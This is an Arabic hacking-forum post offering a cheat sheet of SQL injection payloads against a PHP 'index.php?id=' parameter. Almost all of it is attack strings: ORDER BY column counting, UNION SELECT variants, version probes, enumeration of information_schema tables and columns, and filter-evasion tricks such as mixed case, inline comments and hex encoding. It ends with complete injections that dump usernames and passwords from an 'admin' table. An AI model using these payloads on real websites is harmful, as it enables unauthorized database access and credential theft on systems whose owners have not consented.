بسم الله الرحمن الرحيم
والصلاة والسلام على رسوله الكريم
السلام عليكم
كيفكم اخوتي ان شاء الله بخير
انا شفت كثير اسئلة تطرح وشفت ايضا تقريبا نفس الاسئلة مع انو اخي فولكانو جاوب عليها بالدورة
وربي ماراح تلاقون دورة احسن من دورة اخي فولكانو
عموما حبيت احط هالموضوع وهو للتذكير
كود:
index.php?id=1 order by 1
كود:
index.php?id=1 order by 1--
كود:
index.php?id=1 order by 1/*
كود:
index.php?id=1 OrDeR BY 1
كود:
index.php?id=1+and+1=1 order by 1
كود:
index.php?id=1+and+1=1 order by 1--
كود:
index.php?id=1+and+1=1 order by 1/*
*******************************
كود:
index.php?id=-1 union select
كود:
index.php?id=-1 UNION SELECT
كود:
index.php?id=-1 UnIoN SeLEcT
كود:
index.php?id=1+and+1=2 union select
كود:
index.php?id=1+and+1=2 UNION SELECT
كود:
index.php?id=1+and+1=2 UnIoN SeLEcT
كود:
index.php?id=-1 /**/union/**/ select
كود:
index.php?id=-1 union /*!select*/
***************************
كود:
version()
@version
@@version
UNHEX(HEX(version()))
************************
كود:
concat(table_name,0x3a,column_name,0x3a,table_schema)
كود:
CONCAT(table_name,0x3a,column_name,0x3a,table_schema)
كود:
CoNcAt(table_name,0x3a,column_name,0x3a,table_schema)
كود:
/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema)
كود:
/*!CONCAT*/(table_name,0x3a,column_name,0x3a,table_schema)
كود:
/*!CoNcAt*/(table_name,0x3a,column_name,0x3a,table_schema)
كود:
/*!concat(table_name,0x3a,column_name,0x3a,table_schema)*/
كود:
/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema)*/
كود:
/*!CoNcAt(table_name,0x3a,column_name,0x3a,table_schema)*/
كود:
UNHEX(HEX(concat(table_name,0x3a,column_name,0x3a,table_schema)))
تشفير الكو***يت بالكودر
كود:
%63%6F%6E%63%61%74(table_name,0x3a,column_name,0x3a,table_schema)
************************************************** ***
كود:
+from+information_schema.columns
كود:
+/*from*/+information_schema.columns
كود:
+/*!from+information_schema.columns*/
كود:
+from+/*!information_schema.columns*/
تشفير فروم بالكودر
كود:
+%66%72%6F%6D+information_schema.columns
تشفير الشيما
كود:
+from+information_%73%68%65%6D%61.columns
********************************************
كود:
+where+column_name+LIKE+
كود:
+/*where+column_name+LIKE+*/
كود:
+/*where*/+column_name+LIKE+
************************************
كود:
/*!where+table_name=*/
**************************************
اخر الحقنة كمثال
كود:
index.php?id=-1 union select 1,2,concat(username,0x3a,id_name,0x3a,password),4++from+admin
كود:
index.php?id=-1 union select 1,2,UNHEX(HEX(concat(username,0x3a,id_name,0x3a,password))),4++from+admin
كود:
index.php?id=-1 union select 1,2,concat(username,0x3a,id_name,0x3a,password),4+/*from*/+admin
كود:
index.php?id=-1 union select 1,2,concat(username,0x3a,id_name,0x3a,password),4+/*from+admin*/
كود:
index.php?id=-1 union select 1,2,concat(username,0x3a,id_name,0x3a,password),4+%66%72%6F%6D+admin
كود:
index.php?id=-1 union select 1,2,CONVERT(concat(username,0x3a,id_name,0x3a,password) USING utf8),4+from+admin
معذرة شباب على اللخبطة انا جيت من الشغل مباشرة لاعمللكم هالموضوع
والسلام عليكم ورحمة الله
glh j;lg ],vm hod t,g;hk, t,j gi,k